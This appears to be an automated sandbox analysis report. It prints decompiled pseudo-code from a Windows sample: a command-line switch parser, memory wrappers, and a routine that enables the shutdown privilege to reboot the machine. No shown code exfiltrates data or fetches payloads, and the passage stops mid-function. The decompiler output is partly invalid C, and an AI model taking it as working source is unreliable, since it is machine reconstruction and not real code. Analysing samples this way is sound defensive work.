Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4664117ba88106b876a9abd8b9428fa4f5bc7529fadffa20b42ee79d07d1a281
Instruction ID: 5a77bb22ea677372d900bd9a9a878ef20278df6b289944463faf2463a58a3a35
Opcode Fuzzy Hash: 4664117ba88106b876a9abd8b9428fa4f5bc7529fadffa20b42ee79d07d1a281
Instruction Fuzzy Hash: 56F01275500B089E5B72CF39DC00F53BBF4BAA63613170D2E946FD2190DB34A841CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00AC66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00ac66b1
0x00ac66ba
0x00ac66c7
0x00ac66bc
0x00ac66be
0x00ac66be

APIs

GetFileAttributesA.KERNELBASE(?,00AC4777,?,00AC4E38,?), ref: 00AC66B1

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6b3d8d3b27ec2c591d3af0700148bf88884a4a348b65f096e40afab6309cd66e
Instruction ID: 6af95a4febb6054d52b396dcba2dc27d12273edd46ff6ace6ddc73cf04c5dc34
Opcode Fuzzy Hash: 6b3d8d3b27ec2c591d3af0700148bf88884a4a348b65f096e40afab6309cd66e
Instruction Fuzzy Hash: ABB09276222444826A2487716C29A662941A6D123A7E61B94F032C01E0CA3EC846E004

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00ac4caa
0x00ac4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00AC4CAA

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 92f7c4fbb0423708c115c63882190e830966de6a3acd0668863d0c4e0c7a0372
Instruction ID: e59fe1483843290ceca5976b51c8dbe98e27903ba6e5a8c1443c277ccb55f90a
Opcode Fuzzy Hash: 92f7c4fbb0423708c115c63882190e830966de6a3acd0668863d0c4e0c7a0372
Instruction Fuzzy Hash: 8EB0123204420CB7CF001FC2EC09F953F5DE7C47A5F150000F60C45450CA7294118696

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00ac4cc8
0x00ac4ccf

APIs

GlobalFree.KERNELBASE ref: 00AC4CC8

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: ac620d6c7eedb070be5778b44fe6327de0047fe2e93bee68882d96d892dad493
Instruction ID: fd4bd4d79ac2bd4df00c009b2ea087630dfbe93262e7b0302327ae88c30ba7f0
Opcode Fuzzy Hash: ac620d6c7eedb070be5778b44fe6327de0047fe2e93bee68882d96d892dad493
Instruction Fuzzy Hash: EFB0123100010CB78F001B82EC08C553F5DD6C02A47010010F50C41421CB3398128585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AC5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00AC5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xac8004; // 0xc32e3ded
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00AC6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00AC6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xac8004; // 0xc32e3ded
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00AC597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00AC44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xac9124 = E00AC6285();
									_t75 = 0;
								}
								return E00AC6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00AC44B9(0, 0x521, 0xac1140, 0, 0x40, 0);
												_t85 =  *0xac8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00AC667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00AC667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00AC5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00AC1680(0xac8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00AC667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00AC667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xac8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00AC5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xac8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xac8a3a;
																}
																E00AC1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00AC658A(_t218, 0x104, 0xac1140);
																if(E00AC31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xac8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xac8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xac8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xac8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xac8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xac9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xac9a2c =  *0xac9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xac8d48 =  *0xac8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xac9a2c =  *0xac9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xac9a2c =  *0xac9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xac8d48 =  *0xac8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xac9a2c =  *0xac9a2c | 0x00000004;
																										L70:
																										 *0xac8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xac9a2c = 3;
																	 *0xac8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xac8a2c != 0 &&  *0xac8b3e == 0) {
						if(GetModuleFileNameA( *0xac9a3c, 0xac8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00AC66C8(0xac8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00ac5c9e
0x00ac5ca9
0x00ac5cb0
0x00ac5cb3
0x00ac5cb6
0x00ac5cb7
0x00ac5cb8
0x00ac5cbd
0x00ac6204
0x00ac5ccb
0x00000000
0x00ac5ccb
0x00ac5cd3
0x00ac5cd7
0x00ac5cf4
0x00000000
0x00ac5cf4
0x00ac5cf8
0x00ac5d00
0x00000000
0x00ac5d06
0x00ac5d06
0x00ac5d0e
0x00ac5d10
0x00ac5d12
0x00ac5d14
0x00ac5d15
0x00ac5d17
0x00ac5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac5d19
0x00ac5d19
0x00ac5d1d
0x00000000
0x00ac5d3f
0x00ac5d3f
0x00ac5d4b
0x00ac5d4b
0x00ac5d4f
0x00ac5d8d
0x00000000
0x00ac5d93
0x00ac5d93
0x00ac5d9a
0x00ac5d9d
0x00ac5d9e
0x00000000
0x00ac5d9e
0x00ac5d51
0x00ac5d5b
0x00ac5d72
0x00ac60fb
0x00ac60fb
0x00ac6207
0x00ac620a
0x00ac620b
0x00ac620e
0x00ac6217
0x00ac5d78
0x00ac5d78
0x00ac5d80
0x00ac5d83
0x00ac5d84
0x00000000
0x00ac5d84
0x00ac5d5d
0x00ac5d5f
0x00ac5d62
0x00ac5d68
0x00ac5d64
0x00ac5d64
0x00ac5d64
0x00000000
0x00ac5d62
0x00ac5d5b
0x00ac5d4f
0x00ac5d1d
0x00000000
0x00ac5d9f
0x00ac5d9f
0x00ac5da5
0x00ac5dab
0x00ac5dba
0x00ac6218
0x00ac621d
0x00ac6220
0x00ac6221
0x00ac6229
0x00ac6230
0x00ac6247
0x00ac626a
0x00ac6272
0x00ac6249
0x00ac6255
0x00ac625f
0x00ac6264
0x00ac6264
0x00ac6284
0x00ac5dc0
0x00ac5dc0
0x00ac5dca
0x00ac5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac5dcc
0x00ac5dce
0x00ac5e24
0x00ac5e24
0x00ac5e2c
0x00ac5e47
0x00ac5e4a
0x00ac61d2
0x00ac61e2
0x00ac61e7
0x00ac61ee
0x00ac61f1
0x00ac61f1
0x00ac61f8
0x00ac61f8
0x00ac5e50
0x00ac5e53
0x00ac6109
0x00ac611f
0x00000000
0x00ac6125
0x00ac6137
0x00ac613a
0x00ac613c
0x00ac613e
0x00ac613e
0x00ac6141
0x00ac6141
0x00ac6143
0x00ac6144
0x00ac614a
0x00000000
0x00ac6150
0x00ac6152
0x00ac615c
0x00ac6170
0x00ac6172
0x00ac617c
0x00ac6190
0x00ac6190
0x00ac6196
0x00ac61a5
0x00000000
0x00ac61ab
0x00ac61b9
0x00ac61c6
0x00ac61c6
0x00ac617e
0x00ac6180
0x00ac618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac618a
0x00ac615e
0x00ac6160
0x00ac616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac616a
0x00ac615c
0x00ac614a
0x00ac610b
0x00ac610e
0x00ac610e
0x00000000
0x00ac5e59
0x00ac5e59
0x00ac5e5c
0x00ac604f
0x00ac6056
0x00000000
0x00ac605c
0x00ac606e
0x00ac6071
0x00ac6073
0x00ac6075
0x00ac6075
0x00ac6078
0x00ac6078
0x00ac607a
0x00ac607b
0x00ac6081
0x00000000
0x00ac6087
0x00ac6087
0x00ac608d
0x00ac609c
0x00000000
0x00ac60a2
0x00ac60aa
0x00ac60b2
0x00ac60b7
0x00ac60bd
0x00ac60bf
0x00ac60bf
0x00ac60d6
0x00ac60e0
0x00ac60e7
0x00ac60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac60f5
0x00ac609c
0x00ac6081
0x00ac5e62
0x00ac5e62
0x00ac5e65
0x00ac5fd3
0x00ac5fe9
0x00000000
0x00ac5fef
0x00ac5fef
0x00ac5ff7
0x00ac5ffd
0x00ac6003
0x00ac6006
0x00ac6011
0x00ac6014
0x00ac603d
0x00ac6016
0x00ac6018
0x00ac6019
0x00ac601b
0x00ac6033
0x00ac601d
0x00ac6020
0x00ac6029
0x00ac6022
0x00ac6022
0x00ac6022
0x00ac6020
0x00ac601b
0x00ac6042
0x00ac6044
0x00ac6046
0x00ac604a
0x00ac5ff7
0x00ac5fd5
0x00ac5fd8
0x00ac5fd8
0x00000000
0x00ac5e6b
0x00ac5e6b
0x00ac5e6e
0x00ac5f8b
0x00ac5f99
0x00000000
0x00ac5f9f
0x00ac5fa7
0x00ac5faf
0x00000000
0x00ac5fb1
0x00ac5fb3
0x00000000
0x00ac5fb5
0x00ac5fb7
0x00000000
0x00ac5fb9
0x00000000
0x00ac5fb9
0x00ac5fb7
0x00ac5fb3
0x00ac5faf
0x00ac5f8d
0x00ac5f8d
0x00ac5f8d
0x00ac5f8f
0x00ac5fc1
0x00ac5fc1
0x00ac5fc1
0x00000000
0x00ac5e74
0x00ac5e74
0x00ac5e77
0x00ac5ea0
0x00ac5ebd
0x00ac5f79
0x00000000
0x00ac5f7f
0x00ac5ec3
0x00ac5ec3
0x00ac5ecc
0x00ac5ed4
0x00ac5ed6
0x00ac5edc
0x00ac5edf
0x00ac5eea
0x00ac5eed
0x00ac5f3f
0x00ac5f40
0x00000000
0x00ac5eef
0x00ac5eef
0x00ac5ef2
0x00ac5f34
0x00ac5ef4
0x00ac5ef4
0x00ac5ef7
0x00ac5f2b
0x00000000
0x00ac5ef9
0x00ac5ef9
0x00ac5efc
0x00ac5f22
0x00000000
0x00ac5efe
0x00ac5eff
0x00ac5f02
0x00ac5f16
0x00ac5f04
0x00ac5f07
0x00ac5f0d
0x00ac5f46
0x00ac5f46
0x00ac5f09
0x00ac5f09
0x00ac5f09
0x00ac5f07
0x00ac5f02
0x00ac5efc
0x00ac5ef7
0x00ac5ef2
0x00ac5f4c
0x00ac5f4e
0x00ac5f50
0x00ac5f54
0x00ac5ed4
0x00ac5ea2
0x00ac5ea4
0x00ac5eaf
0x00ac5eaf
0x00000000
0x00ac5e79
0x00ac5e7d
0x00000000
0x00ac5e83
0x00ac5e83
0x00ac5e83
0x00ac5e85
0x00ac5e85
0x00ac5e8e
0x00000000
0x00ac5e94
0x00000000
0x00ac5e94
0x00ac5e8e
0x00ac5e7d
0x00ac5e77
0x00ac5e6e
0x00ac5e65
0x00ac5e5c
0x00000000
0x00000000
0x00000000
0x00ac5dd0
0x00ac5dd0
0x00ac5dd0
0x00000000
0x00ac5dd0
0x00ac5dce
0x00ac5dca
0x00ac5dba
0x00000000
0x00ac5d00
0x00ac5dd9
0x00ac5e04
0x00ac61fe
0x00ac5e0a
0x00ac5e0c
0x00ac5e17
0x00ac5e17
0x00ac5e04
0x00ac6200
0x00ac6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00AC5CEE
GetModuleFileNameA.KERNEL32(00AC8B3E,00000104,00000000,?,?), ref: 00AC5DFC
CharUpperA.USER32(?), ref: 00AC5E3E
CharUpperA.USER32(-00000052), ref: 00AC5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00AC5F6F
CharUpperA.USER32(?), ref: 00AC5FA7
CharUpperA.USER32(-0000004E), ref: 00AC6008
CharUpperA.USER32(?), ref: 00AC60AA
CloseHandle.KERNEL32(00000000,00AC1140,00000000,00000040,00000000), ref: 00AC61F1
ExitProcess.KERNEL32 ref: 00AC61F8

Strings

RegServer, xrefs: 00AC5F66
", xrefs: 00AC612D
", xrefs: 00AC5D78
:, xrefs: 00AC6118

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 640cafd0d02e5a5afc033507ad12f55354631aea6136b4cb16742357161ae068
Instruction ID: c1d48bfd03ecbad6118a97f9511b19a68d700d36c6e6e39915100b6045ae284d
Opcode Fuzzy Hash: 640cafd0d02e5a5afc033507ad12f55354631aea6136b4cb16742357161ae068
Instruction Fuzzy Hash: BAD15A71E08A445EDF39CB3C8C48FFA37A1AB16344F1B41ADE486D6191DA74AEC2CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00AC1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xac9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xac8004; // 0xc32e3ded
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00AC44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00AC6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00AC44B9(0, 0x522, 0xac1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00AC1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00ac1f90
0x00ac1f90
0x00ac1f93
0x00ac1f98
0x00ac1fa4
0x00ac1fa7
0x00ac1fc5
0x00ac1fcd
0x00ac1fdb
0x00ac1ee5
0x00ac1eea
0x00ac1ef1
0x00ac1ef4
0x00ac1f0c
0x00ac1f2e
0x00ac1f3a
0x00ac1f46
0x00ac1f4d
0x00ac1f58
0x00ac1f60
0x00ac1f61
0x00ac1f62
0x00ac1f75
0x00ac1f80
0x00ac1f77
0x00ac1f77
0x00000000
0x00ac1f77
0x00ac1f64
0x00ac1f64
0x00000000
0x00ac1f64
0x00ac1f0e
0x00ac1f0e
0x00ac1f13
0x00ac1f13
0x00ac1f14
0x00ac1f14
0x00ac1f16
0x00ac1f17
0x00ac1f1a
0x00ac1f1f
0x00ac1f1f
0x00ac1f86
0x00ac1f8f
0x00ac1fcf
0x00ac1fd3
0x00000000
0x00ac1fd3
0x00ac1fa9
0x00ac1fb4
0x00ac1fbb
0x00ac1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac1fc3
0x00ac1f9a
0x00ac1f9a
0x00ac1fa2
0x00ac1fd9
0x00ac1fda
0x00000000
0x00000000
0x00000000
0x00ac1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00AC1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00AC1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00AC1FD3

Strings

SeShutdownPrivilege, xrefs: 00AC1F28

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: df79233d657cc42c6ef213b6a82e48397e22de4593b683b1e40677abdad66c8a
Instruction ID: 2226d01446aa0643d61bdfe481ae9a99a25f129ae406cd3c288c332291418c7a
Opcode Fuzzy Hash: df79233d657cc42c6ef213b6a82e48397e22de4593b683b1e40677abdad66c8a
Instruction Fuzzy Hash: 9F21FC71B402057BDB20DBE19C4EF7F76B8EB86754F22051DFA02E6182D7758802D2A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC6CF0(struct _EXCEPTION_POINTERS* _a4) {

